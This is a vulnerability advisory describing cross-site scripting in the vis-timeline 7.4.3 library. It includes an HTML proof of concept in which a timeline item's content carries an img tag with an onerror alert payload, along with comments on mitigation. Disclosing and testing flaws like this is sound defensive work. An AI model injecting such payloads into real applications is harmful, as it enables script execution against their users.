vis-timeline (Timeline/Graph2D) is an interactive visualization chart for visualizing data in time.
Affected versions of this package are vulnerable to Cross-site Scripting (XSS). An attacker who can control the items of a Timeline element can inject additional script code into the generated application, because item content is rendered as HTML rather than escaped text.
PoC
<!DOCTYPE html>
<html>
<!-- Proof of concept for the advisory above: loads the pinned 7.4.3 release from a CDN
     (with subresource-integrity hashes) and feeds one item whose `content` carries markup. -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/vis-timeline/7.4.3/vis-timeline-graph2d.min.js" integrity="sha512-3FADGlV0gOpnQn56VOryrvOeY1zMrNiSMyDnxD/5ZEBJgt5n+IcAvfzm16/Cwyhro9RJgFgBWeoUmLceNgbTrA==" crossorigin="anonymous"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/vis-timeline/7.4.3/vis-timeline-graph2d.css" integrity="sha512-GFG4HXPbPcM487tbwN4sscz1AVK9uQcY7Y6uWwLlgWbAXCJI2V/n7Em7vKpH+Q1cqQh1PyCavHr94KaWi0UgOA==" crossorigin="anonymous" />
<body>
<style>
body,
html {
font-family: sans-serif;
}
</style>
<p>A basic timeline. You can move and zoom the timeline, and select items.</p>
<div id="visualization"></div>
<script>
// DOM element where the Timeline will be attached
var container = document.getElementById("visualization");
// Create a DataSet (allows two way data-binding)
// Security note: the Timeline inserts each item's `content` as HTML, not as text.
// In a real application this field must never receive unsanitized data that an
// attacker can influence (database rows, query parameters, imported files).
var items = new vis.DataSet([
// Item 1 is the PoC: the inline onerror handler fires when the item is rendered,
// proving that markup in `content` reaches the DOM unescaped (this is the defect
// the advisory describes, not application code to copy).
{ id: 1, content: "item<img src='xxx' onerror='alert(/XSS/);' />", start: "2014-04-20" },
{ id: 2, content: "item 2", start: "2014-04-14" },
{ id: 3, content: "item 3", start: "2014-04-18" },
{ id: 4, content: "item 4", start: "2014-04-16", end: "2014-04-19" },
{ id: 5, content: "item 5", start: "2014-04-25" },
{ id: 6, content: "item 6", start: "2014-04-27", type: "point" },
]);
// Configuration for the Timeline
// Left empty: no template or sanitizer is configured, so content strings pass straight through.
// Mitigations for consumers: escape item content before handing it to the DataSet, or pass a
// DOM element built with textContent instead of an HTML string (`content` accepts an Element);
// newer releases also document an `xss` filter option and a fixed version — confirm against
// the release you actually ship.
var options = {};
var timeline = new vis.Timeline(container, items, options);
</script>
</body>
</html>